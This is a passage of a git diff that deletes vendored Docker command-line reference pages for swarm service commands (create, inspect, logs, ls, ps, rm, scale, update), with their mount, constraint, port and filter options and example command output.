  • `type=volume`: `src` is an optional way to specify the name of the volume (for example, `src=my-volume`). If the named volume does not exist, it is automatically created. If no `src` is specified, the volume is assigned a random name which is guaranteed to be unique on the host, but may not be unique cluster-wide. A randomly-named volume has the same lifecycle as its container and is destroyed when the *container* is destroyed (which is upon `service update`, or when scaling or re-balancing the service).
  • `type=bind`: `src` is required, and specifies an absolute path to the file or directory to bind-mount (for example, `src=/path/on/host/`). An error is produced if the file or directory does not exist.
  • `type=tmpfs`: `src` is not supported.
-| **dst** or **destination** or **target** | yes | Mount path inside the container, for example `/some/path/in/container/`. If the path does not exist in the container's filesystem, the Engine creates a directory at the specified location before mounting the volume or bind-mount. -| **readonly** or **ro** | | The Engine mounts binds and volumes `read-write` unless `readonly` option is given when mounting the bind or volume.

  • `true` or `1` or no value: Mounts the bind or volume read-only.
  • `false` or `0`: Mounts the bind or volume read-write.
- -#### Bind Propagation - -Bind propagation refers to whether or not mounts created within a given -bind-mount or named volume can be propagated to replicas of that mount. Consider -a mount point `/mnt`, which is also mounted on `/tmp`. The propation settings -control whether a mount on `/tmp/a` would also be available on `/mnt/a`. Each -propagation setting has a recursive counterpoint. In the case of recursion, -consider that `/tmp/a` is also mounted as `/foo`. The propagation settings -control whether `/mnt/a` and/or `/tmp/a` would exist. - -The `bind-propagation` option defaults to `rprivate` for both bind-mounts and -volume mounts, and is only configurable for bind-mounts. In other words, named -volumes do not support bind propagation. - -- **`shared`**: Sub-mounts of the original mount are exposed to replica mounts, - and sub-mounts of replica mounts are also propagated to the - original mount. -- **`slave`**: similar to a shared mount, but only in one direction. If the - original mount exposes a sub-mount, the replica mount can see it. - However, if the replica mount exposes a sub-mount, the original - mount cannot see it. -- **`private`**: The mount is private. Sub-mounts within it are not exposed to - replica mounts, and sub-mounts of replica mounts are not - exposed to the original mount. -- **`rshared`**: The same as shared, but the propagation also extends to and from - mount points nested within any of the original or replica mount - points. -- **`rslave`**: The same as `slave`, but the propagation also extends to and from - mount points nested within any of the original or replica mount - points. -- **`rprivate`**: The default. The same as `private`, meaning that no mount points - anywhere within the original or replica mount points propagate - in either direction. - -For more information about bind propagation, see the -[Linux kernel documentation for shared subtree](https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt). 
- -#### Options for Named Volumes -The following options can only be used for named volumes (`type=volume`); - -| Option | Description -|:----------------------|:-------------------------------------------------------------------------------------------------------------------- -| **volume-driver** | Name of the volume-driver plugin to use for the volume. Defaults to ``"local"``, to use the local volume driver to create the volume if the volume does not exist. -| **volume-label** | One or more custom metadata ("labels") to apply to the volume upon creation. For example, `volume-label=mylabel=hello-world,my-other-label=hello-mars`. For more information about labels, refer to [apply custom metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). -| **volume-nocopy** | By default, if you attach an empty volume to a container, and files or directories already existed at the mount-path in the container (`dst`), the Engine copies those files and directories into the volume, allowing the host to access them. Set `volume-nocopy` to disables copying files from the container's filesystem to the volume and mount the empty volume.

A value is optional:
  • `true` or `1`: Default if you do not provide a value. Disables copying.
  • `false` or `0`: Enables copying.
-| **volume-opt** | Options specific to a given volume driver, which will be passed to the driver when creating the volume. Options are provided as a comma-separated list of key/value pairs, for example, `volume-opt=some-option=some-value,some-other-option=some-other-value`. For available options for a given driver, refer to that driver's documentation. - -#### Options for tmpfs -The following options can only be used for tmpfs mounts (`type=tmpfs`); - -| Option | Description -|:----------------------|:-------------------------------------------------------------------------------------------------------------------- -| **tmpfs-size** | Size of the tmpfs mount in bytes. Unlimited by default in Linux. -| **tmpfs-mode** | File mode of the tmpfs in octal. (e.g. `"700"` or `"0700"`.) Defaults to ``"1777"`` in Linux. - -#### Differences between "--mount" and "--volume" - -The `--mount` flag supports most options that are supported by the `-v` -or `--volume` flag for `docker run`, with some important exceptions: - -- The `--mount` flag allows you to specify a volume driver and volume driver - options *per volume*, without creating the volumes in advance. In contrast, - `docker run` allows you to specify a single volume driver which is shared - by all volumes, using the `--volume-driver` flag. - -- The `--mount` flag allows you to specify custom metadata ("labels") for a volume, - before the volume is created. - -- When you use `--mount` with `type=bind`, the host-path must refer to an *existing* - path on the host. The path will not be created for you and the service will fail - with an error if the path does not exist. - -- The `--mount` flag does not allow you to relabel a volume with `Z` or `z` flags, - which are used for `selinux` labeling. 
- -#### Create a service using a named volume - -The following example creates a service that uses a named volume: - -```bash -$ docker service create \ - --name my-service \ - --replicas 3 \ - --mount type=volume,source=my-volume,destination=/path/in/container,volume-label="color=red",volume-label="shape=round" \ - nginx:alpine -``` - -For each replica of the service, the engine requests a volume named "my-volume" -from the default ("local") volume driver where the task is deployed. If the -volume does not exist, the engine creates a new volume and applies the "color" -and "shape" labels. - -When the task is started, the volume is mounted on `/path/in/container/` inside -the container. - -Be aware that the default ("local") volume is a locally scoped volume driver. -This means that depending on where a task is deployed, either that task gets a -*new* volume named "my-volume", or shares the same "my-volume" with other tasks -of the same service. Multiple containers writing to a single shared volume can -cause data corruption if the software running inside the container is not -designed to handle concurrent processes writing to the same location. Also take -into account that containers can be re-scheduled by the Swarm orchestrator and -be deployed on a different node. - -#### Create a service that uses an anonymous volume - -The following command creates a service with three replicas with an anonymous -volume on `/path/in/container`: - -```bash -$ docker service create \ - --name my-service \ - --replicas 3 \ - --mount type=volume,destination=/path/in/container \ - nginx:alpine -``` - -In this example, no name (`source`) is specified for the volume, so a new volume -is created for each task. This guarantees that each task gets its own volume, -and volumes are not shared between tasks. Anonymous volumes are removed after -the task using them is complete. 
- -#### Create a service that uses a bind-mounted host directory - -The following example bind-mounts a host directory at `/path/in/container` in -the containers backing the service: - -```bash -$ docker service create \ - --name my-service \ - --mount type=bind,source=/path/on/host,destination=/path/in/container \ - nginx:alpine -``` - -### Set service mode (--mode) - -The service mode determines whether this is a _replicated_ service or a _global_ -service. A replicated service runs as many tasks as specified, while a global -service runs on each active node in the swarm. - -The following command creates a global service: - -```bash -$ docker service create \ - --name redis_2 \ - --mode global \ - redis:3.0.6 -``` - -### Specify service constraints (--constraint) - -You can limit the set of nodes where a task can be scheduled by defining -constraint expressions. Multiple constraints find nodes that satisfy every -expression (AND match). Constraints can match node or Docker Engine labels as -follows: - -| node attribute | matches | example | -|:----------------|:--------------------------|:------------------------------------------------| -| node.id | node ID | `node.id == 2ivku8v2gvtg4` | -| node.hostname | node hostname | `node.hostname != node-2` | -| node.role | node role: manager | `node.role == manager` | -| node.labels | user defined node labels | `node.labels.security == high` | -| engine.labels | Docker Engine's labels | `engine.labels.operatingsystem == ubuntu 14.04` | - -`engine.labels` apply to Docker Engine labels like operating system, -drivers, etc. Swarm administrators add `node.labels` for operational purposes by -using the [`docker node update`](node_update.md) command. 
- -For example, the following limits tasks for the redis service to nodes where the -node type label equals queue: - -```bash -$ docker service create \ - --name redis_2 \ - --constraint 'node.labels.type == queue' \ - redis:3.0.6 -``` - -### Attach a service to an existing network (--network) - -You can use overlay networks to connect one or more services within the swarm. - -First, create an overlay network on a manager node the docker network create -command: - -```bash -$ docker network create --driver overlay my-network - -etjpu59cykrptrgw0z0hk5snf -``` - -After you create an overlay network in swarm mode, all manager nodes have -access to the network. - -When you create a service and pass the --network flag to attach the service to -the overlay network: - -```bash -$ docker service create \ - --replicas 3 \ - --network my-network \ - --name my-web \ - nginx - -716thylsndqma81j6kkkb5aus -``` - -The swarm extends my-network to each node running the service. - -Containers on the same network can access each other using -[service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery). - -### Publish service ports externally to the swarm (-p, --publish) - -You can publish service ports to make them available externally to the swarm -using the `--publish` flag: - -```bash -$ docker service create --publish : nginx -``` - -For example: - -```bash -$ docker service create --name my_web --replicas 3 --publish 8080:80 nginx -``` - -When you publish a service port, the swarm routing mesh makes the service -accessible at the target port on every node regardless if there is a task for -the service running on the node. For more information refer to -[Use swarm mode routing mesh](https://docs.docker.com/engine/swarm/ingress/). - -### Publish a port for TCP only or UDP only - -By default, when you publish a port, it is a TCP port. You can -specifically publish a UDP port instead of or in addition to a TCP port. 
When -you publish both TCP and UDP ports, Docker 1.12.2 and earlier require you to -add the suffix `/tcp` for TCP ports. Otherwise it is optional. - -#### TCP only - -The following two commands are equivalent. - -```bash -$ docker service create --name dns-cache -p 53:53 dns-cache - -$ docker service create --name dns-cache -p 53:53/tcp dns-cache -``` - -#### TCP and UDP - -```bash -$ docker service create --name dns-cache -p 53:53/tcp -p 53:53/udp dns-cache -``` - -#### UDP only - -```bash -$ docker service create --name dns-cache -p 53:53/udp dns-cache -``` - -### Create services using templates - -You can use templates for some flags of `service create`, using the syntax -provided by the Go's [text/template](http://golange.org/pkg/text/template/) package. - -The supported flags are the following : - -- `--hostname` -- `--mount` -- `--env` - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ------------------ | -------------------------------------------- -`.Service.ID` | Service ID -`.Service.Name` | Service name -`.Service.Labels` | Service labels -`.Node.ID` | Node ID -`.Task.ID` | Task ID -`.Task.Name` | Task name -`.Task.Slot` | Task slot - -#### Template example - -In this example, we are going to set the template of the created containers based on the -service's name and the node's ID where it sits. 
- -```bash -$ docker service create --name hosttempl --hostname={% raw %}"{{.Node.ID}}-{{.Service.Name}}"{% endraw %} busybox top -va8ew30grofhjoychbr6iot8c - -$ docker service ps va8ew30grofhjoychbr6iot8c -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -wo41w8hg8qan hosttempl.1 busybox:latest@sha256:29f5d56d12684887bdfa50dcd29fc31eea4aaf4ad3bec43daf19026a7ce69912 2e7a8a9c4da2 Running Running about a minute ago - -$ docker inspect --format={% raw %}"{{.Config.Hostname}}"{% endraw %} hosttempl.1.wo41w8hg8qanxwjwsg4kxpprj -x3ti0erg11rjpg64m75kej2mz-hosttempl -``` - -## Related information - -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) - - diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md deleted file mode 100644 index 8b4ab62d89..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md +++ /dev/null @@ -1,162 +0,0 @@ ---- -title: "service inspect" -description: "The service inspect command description and usage" -keywords: "service, inspect" ---- - - - -# service inspect - -```Markdown -Usage: docker service inspect [OPTIONS] SERVICE [SERVICE...] - -Display detailed information on one or more services - -Options: - -f, --format string Format the output using the given Go template - --help Print usage - --pretty Print the information in a human friendly format. -``` - - -Inspects the specified service. This command has to be run targeting a manager -node. - -By default, this renders all results in a JSON array. If a format is specified, -the given template will be executed for each result. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. 
- -## Examples - -### Inspecting a service by name or ID - -You can inspect a service, either by its *name*, or *ID* - -For example, given the following service; - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 -``` - -Both `docker service inspect redis`, and `docker service inspect dmu1ept4cxcf` -produce the same result: - -```bash -$ docker service inspect redis -[ - { - "ID": "dmu1ept4cxcfe8k8lhtux3ro3", - "Version": { - "Index": 12 - }, - "CreatedAt": "2016-06-17T18:44:02.558012087Z", - "UpdatedAt": "2016-06-17T18:44:02.558012087Z", - "Spec": { - "Name": "redis", - "TaskTemplate": { - "ContainerSpec": { - "Image": "redis:3.0.6" - }, - "Resources": { - "Limits": {}, - "Reservations": {} - }, - "RestartPolicy": { - "Condition": "any", - "MaxAttempts": 0 - }, - "Placement": {} - }, - "Mode": { - "Replicated": { - "Replicas": 1 - } - }, - "UpdateConfig": {}, - "EndpointSpec": { - "Mode": "vip" - } - }, - "Endpoint": { - "Spec": {} - } - } -] -``` - -```bash -$ docker service inspect dmu1ept4cxcf -[ - { - "ID": "dmu1ept4cxcfe8k8lhtux3ro3", - "Version": { - "Index": 12 - }, - ... - } -] -``` - -### Inspect a service using pretty-print - -You can print the inspect output in a human-readable format instead of the default -JSON output, by using the `--pretty` option: - -```bash -$ docker service inspect --pretty frontend -ID: c8wgl7q4ndfd52ni6qftkvnnp -Name: frontend -Labels: - - org.example.projectname=demo-app -Service Mode: REPLICATED - Replicas: 5 -Placement: -UpdateConfig: - Parallelism: 0 -ContainerSpec: - Image: nginx:alpine -Resources: -Endpoint Mode: vip -Ports: - Name = - Protocol = tcp - TargetPort = 443 - PublishedPort = 4443 -``` - -You can also use `--format pretty` for the same effect. - - -### Finding the number of tasks running as part of a service - -The `--format` option can be used to obtain specific information about a -service. 
For example, the following command outputs the number of replicas -of the "redis" service. - -```bash{% raw %} -$ docker service inspect --format='{{.Spec.Mode.Replicated.Replicas}}' redis -10 -{% endraw %}``` - - -## Related information - -* [service create](service_create.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md deleted file mode 100644 index fdf6a3a245..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md +++ /dev/null @@ -1,77 +0,0 @@ ---- -title: "service logs (experimental)" -description: "The service logs command description and usage" -keywords: "service, logs" -advisory: "experimental" ---- - - - -# service logs - -```Markdown -Usage: docker service logs [OPTIONS] SERVICE - -Fetch the logs of a service - -Options: - --details Show extra details provided to logs - -f, --follow Follow log output - --help Print usage - --since string Show logs since timestamp - --tail string Number of lines to show from the end of the logs (default "all") - -t, --timestamps Show timestamps -``` - -The `docker service logs` command batch-retrieves logs present at the time of execution. - -> **Note**: this command is only functional for services that are started with -> the `json-file` or `journald` logging driver. - -For more information about selecting and configuring logging drivers, refer to -[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). - -The `docker service logs --follow` command will continue streaming the new output from -the service's `STDOUT` and `STDERR`. 
- -Passing a negative number or a non-integer to `--tail` is invalid and the -value is set to `all` in that case. - -The `docker service logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) -, for example `2014-09-16T06:17:46.000000000Z`, to each -log entry. To ensure that the timestamps are aligned the -nano-second part of the timestamp will be padded with zero when necessary. - -The `docker service logs --details` command will add on extra attributes, such as -environment variables and labels, provided to `--log-opt` when creating the -service. - -The `--since` option shows only the service logs generated after -a given date. You can specify the date as an RFC 3339 date, a UNIX -timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date -format you may also use RFC3339Nano, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. You can combine the -`--since` option with either or both of the `--follow` or `--tail` options. 
- -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md deleted file mode 100644 index ccd68af750..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md +++ /dev/null @@ -1,114 +0,0 @@ ---- -title: "service ls" -description: "The service ls command description and usage" -keywords: "service, ls" ---- - - - -# service ls - -```Markdown -Usage: docker service ls [OPTIONS] - -List services - -Aliases: - ls, list - -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - -q, --quiet Only display IDs -``` - -This command when run targeting a manager, lists services are running in the -swarm. - -On a manager node: -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -c8wgl7q4ndfd frontend replicated 5/5 nginx:alpine -dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 -iwe3278osahj mongo global 7/7 mongo:3.3 -``` - -The `REPLICAS` column shows both the *actual* and *desired* number of tasks for -the service. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* [id](service_ls.md#id) -* [label](service_ls.md#label) -* [name](service_ls.md#name) - -#### ID - -The `id` filter matches all or part of a service's id. 
- -```bash -$ docker service ls -f "id=0bcjw" -ID NAME MODE REPLICAS IMAGE -0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 -``` - -#### Label - -The `label` filter matches services based on the presence of a `label` alone or -a `label` and a value. - -The following filter matches all services with a `project` label regardless of -its value: - -```bash -$ docker service ls --filter label=project -ID NAME MODE REPLICAS IMAGE -01sl1rp6nj5u frontend2 replicated 1/1 nginx:alpine -36xvvwwauej0 frontend replicated 5/5 nginx:alpine -74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 -``` - -The following filter matches only services with the `project` label with the -`project-a` value. - -```bash -$ docker service ls --filter label=project=project-a -ID NAME MODE REPLICAS IMAGE -36xvvwwauej0 frontend replicated 5/5 nginx:alpine -74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 -``` - -#### Name - -The `name` filter matches on all or part of a service's name. - -The following filter matches services with a name containing `redis`. 
- -```bash -$ docker service ls --filter name=redis -ID NAME MODE REPLICAS IMAGE -0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 -``` - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md deleted file mode 100644 index 61abb15f67..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md +++ /dev/null @@ -1,161 +0,0 @@ ---- -title: "service ps" -description: "The service ps command description and usage" -keywords: "service, tasks, ps" -aliases: ["/engine/reference/commandline/service_tasks/"] ---- - - - -# service ps - -```Markdown -Usage: docker service ps [OPTIONS] SERVICE - -List the tasks of a service - -Options: - -f, --filter filter Filter output based on conditions provided - --help Print usage - --no-resolve Do not map IDs to Names - --no-trunc Do not truncate output - -q, --quiet Only display task IDs -``` - -Lists the tasks that are running as part of the specified service. This command -has to be run targeting a manager node. 
- -## Examples - -### Listing the tasks that are part of a service - -The following command shows all the tasks that are part of the `redis` service: - -```bash -$ docker service ps redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -0qihejybwf1x redis.1 redis:3.0.5 manager1 Running Running 8 seconds -bk658fpbex0d redis.2 redis:3.0.5 worker2 Running Running 9 seconds -5ls5s5fldaqg redis.3 redis:3.0.5 worker1 Running Running 9 seconds -8ryt076polmc redis.4 redis:3.0.5 worker1 Running Running 9 seconds -1x0v8yomsncd redis.5 redis:3.0.5 manager1 Running Running 8 seconds -71v7je3el7rr redis.6 redis:3.0.5 worker2 Running Running 9 seconds -4l3zm9b7tfr7 redis.7 redis:3.0.5 worker2 Running Running 9 seconds -9tfpyixiy2i7 redis.8 redis:3.0.5 worker1 Running Running 9 seconds -3w1wu13yupln redis.9 redis:3.0.5 manager1 Running Running 8 seconds -8eaxrb2fqpbn redis.10 redis:3.0.5 manager1 Running Running 8 seconds -``` - -In addition to _running_ tasks, the output also shows the task history. 
For -example, after updating the service to use the `redis:3.0.6` image, the output -may look like this: - -```bash -$ docker service ps redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -50qe8lfnxaxk redis.1 redis:3.0.6 manager1 Running Running 6 seconds ago -ky2re9oz86r9 \_ redis.1 redis:3.0.5 manager1 Shutdown Shutdown 8 seconds ago -3s46te2nzl4i redis.2 redis:3.0.6 worker2 Running Running less than a second ago -nvjljf7rmor4 \_ redis.2 redis:3.0.6 worker2 Shutdown Rejected 23 seconds ago "No such image: redis@sha256:6…" -vtiuz2fpc0yb \_ redis.2 redis:3.0.5 worker2 Shutdown Shutdown 1 second ago -jnarweeha8x4 redis.3 redis:3.0.6 worker1 Running Running 3 seconds ago -vs448yca2nz4 \_ redis.3 redis:3.0.5 worker1 Shutdown Shutdown 4 seconds ago -jf1i992619ir redis.4 redis:3.0.6 worker1 Running Running 10 seconds ago -blkttv7zs8ee \_ redis.4 redis:3.0.5 worker1 Shutdown Shutdown 11 seconds ago -``` - -The number of items in the task history is determined by the -`--task-history-limit` option that was set when initializing the swarm. You can -change the task history retention limit using the -[`docker swarm update`](swarm_update.md) command. - -When deploying a service, docker resolves the digest for the service's -image, and pins the service to that digest. The digest is not shown by -default, but is printed if `--no-trunc` is used. 
The `--no-trunc` option -also shows the non-truncated task ID, and error-messages, as can be seen below; - -```bash -$ docker service ps --no-trunc redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -50qe8lfnxaxksi9w2a704wkp7 redis.1 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 manager1 Running Running 5 minutes ago -ky2re9oz86r9556i2szb8a8af \_ redis.1 redis:3.0.5@sha256:f8829e00d95672c48c60f468329d6693c4bdd28d1f057e755f8ba8b40008682e worker2 Shutdown Shutdown 5 minutes ago -bk658fpbex0d57cqcwoe3jthu redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Running Running 5 seconds -nvjljf7rmor4htv7l8rwcx7i7 \_ redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Shutdown Rejected 5 minutes ago "No such image: redis@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842" -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. - -The currently supported filters are: - -* [id](#id) -* [name](#name) -* [node](#node) -* [desired-state](#desired-state) - - -#### ID - -The `id` filter matches on all or a prefix of a task's ID. - -```bash -$ docker service ps -f "id=8" redis - -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -8ryt076polmc redis.4 redis:3.0.6 worker1 Running Running 9 seconds -8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds -``` - -#### Name - -The `name` filter matches on task names. 
- -```bash -$ docker service ps -f "name=redis.1" redis -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -qihejybwf1x5 redis.1 redis:3.0.6 manager1 Running Running 8 seconds -``` - - -#### Node - -The `node` filter matches on a node name or a node ID. - -```bash -$ docker service ps -f "node=manager1" redis -ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS -0qihejybwf1x redis.1 redis:3.0.6 manager1 Running Running 8 seconds -1x0v8yomsncd redis.5 redis:3.0.6 manager1 Running Running 8 seconds -3w1wu13yupln redis.9 redis:3.0.6 manager1 Running Running 8 seconds -8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds -``` - - -#### desired-state - -The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. - - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service scale](service_scale.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md deleted file mode 100644 index d0ba90b26d..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md +++ /dev/null @@ -1,55 +0,0 @@ ---- -title: "service rm" -description: "The service rm command description and usage" -keywords: "service, rm" ---- - - - -# service rm - -```Markdown -Usage: docker service rm SERVICE [SERVICE...] - -Remove one or more services - -Aliases: - rm, remove - -Options: - --help Print usage -``` - -Removes the specified services from the swarm. This command has to be run -targeting a manager node. 
- -For example, to remove the redis service: - -```bash -$ docker service rm redis -redis -$ docker service ls -ID NAME MODE REPLICAS IMAGE -``` - -> **Warning**: Unlike `docker rm`, this command does not ask for confirmation -> before removing a running service. - - - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service scale](service_scale.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md deleted file mode 100644 index 64075ed092..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md +++ /dev/null @@ -1,96 +0,0 @@ ---- -title: "service scale" -description: "The service scale command description and usage" -keywords: "service, scale" ---- - - - -# service scale - -```markdown -Usage: docker service scale SERVICE=REPLICAS [SERVICE=REPLICAS...] - -Scale one or multiple replicated services - -Options: - --help Print usage -``` - -## Examples - -### Scale a service - -The scale command enables you to scale one or more replicated services either up -or down to the desired number of replicas. This command cannot be applied on -services which are global mode. The command will return immediately, but the -actual scaling of the service may take some time. To stop all replicas of a -service while keeping the service active in the swarm you can set the scale to 0. - -For example, the following command scales the "frontend" service to 50 tasks. - -```bash -$ docker service scale frontend=50 -frontend scaled to 50 -``` - -The following command tries to scale a global service to 10 tasks and returns an error. 
- -``` -$ docker service create --mode global --name backend backend:latest -b4g08uwuairexjub6ome6usqh -$ docker service scale backend=10 -backend: scale can only be used with replicated mode -``` - -Directly afterwards, run `docker service ls`, to see the actual number of -replicas. - -```bash -$ docker service ls --filter name=frontend - -ID NAME MODE REPLICAS IMAGE -3pr5mlvu3fh9 frontend replicated 15/50 nginx:alpine -``` - -You can also scale a service using the [`docker service update`](service_update.md) -command. The following commands are equivalent: - -```bash -$ docker service scale frontend=50 -$ docker service update --replicas=50 frontend -``` - -### Scale multiple services - -The `docker service scale` command allows you to set the desired number of -tasks for multiple services at once. The following example scales both the -backend and frontend services: - -```bash -$ docker service scale backend=3 frontend=5 -backend scaled to 3 -frontend scaled to 5 - -$ docker service ls -ID NAME MODE REPLICAS IMAGE -3pr5mlvu3fh9 frontend replicated 5/5 nginx:alpine -74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 -``` - -## Related information - -* [service create](service_create.md) -* [service inspect](service_inspect.md) -* [service logs](service_logs.md) -* [service ls](service_ls.md) -* [service rm](service_rm.md) -* [service ps](service_ps.md) -* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md deleted file mode 100644 index 301a0eabe8..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md +++ /dev/null @@ -1,181 +0,0 @@ ---- -title: "service update" -description: "The service update command description and usage" -keywords: "service, update" ---- - - - -# service update - -```Markdown -Usage: docker service update [OPTIONS] SERVICE - -Update a service - -Options: 
- --args string Service command args - --constraint-add list Add or update a placement constraint (default []) - --constraint-rm list Remove a constraint (default []) - --container-label-add list Add or update a container label (default []) - --container-label-rm list Remove a container label by its key (default []) - --dns-add list Add or update a custom DNS server (default []) - --dns-option-add list Add or update a DNS option (default []) - --dns-option-rm list Remove a DNS option (default []) - --dns-rm list Remove a custom DNS server (default []) - --dns-search-add list Add or update a custom DNS search domain (default []) - --dns-search-rm list Remove a DNS search domain (default []) - --endpoint-mode string Endpoint mode (vip or dnsrr) - --env-add list Add or update an environment variable (default []) - --env-rm list Remove an environment variable (default []) - --force Force update even if no changes require it - --group-add list Add an additional supplementary user group to the container (default []) - --group-rm list Remove a previously added supplementary user group from the container (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) - --help Print usage - --host-add list Add or update a custom host-to-IP mapping (host:ip) (default []) - --host-rm list Remove a custom host-to-IP mapping (host:ip) (default []) - --hostname string Container hostname - --image string Service image tag - --label-add list Add or update a service label (default []) - --label-rm list Remove a label by its key (default []) - --limit-cpu decimal Limit CPUs (default 0.000) - --limit-memory bytes Limit Memory (default 0 B) - --log-driver string Logging driver for service - --log-opt list Logging driver options (default []) - --mount-add 
mount Add or update a mount on a service - --mount-rm list Remove a mount by its target path (default []) - --no-healthcheck Disable any container-specified HEALTHCHECK - --publish-add port Add or update a published port - --publish-rm port Remove a published port by its target port - --replicas uint Number of tasks - --reserve-cpu decimal Reserve CPUs (default 0.000) - --reserve-memory bytes Reserve Memory (default 0 B) - --restart-condition string Restart when condition is met (none, on-failure, or any) - --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) - --restart-max-attempts uint Maximum number of restarts before giving up - --restart-window duration Window used to evaluate the restart policy (ns|us|ms|s|m|h) - --rollback Rollback to previous specification - --secret-add secret Add or update a secret on a service - --secret-rm list Remove a secret (default []) - --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) - -t, --tty Allocate a pseudo-TTY - --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) - --update-failure-action string Action on update failure (pause|continue) (default "pause") - --update-max-failure-ratio float Failure rate to tolerate during an update - --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) - --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) - -u, --user string 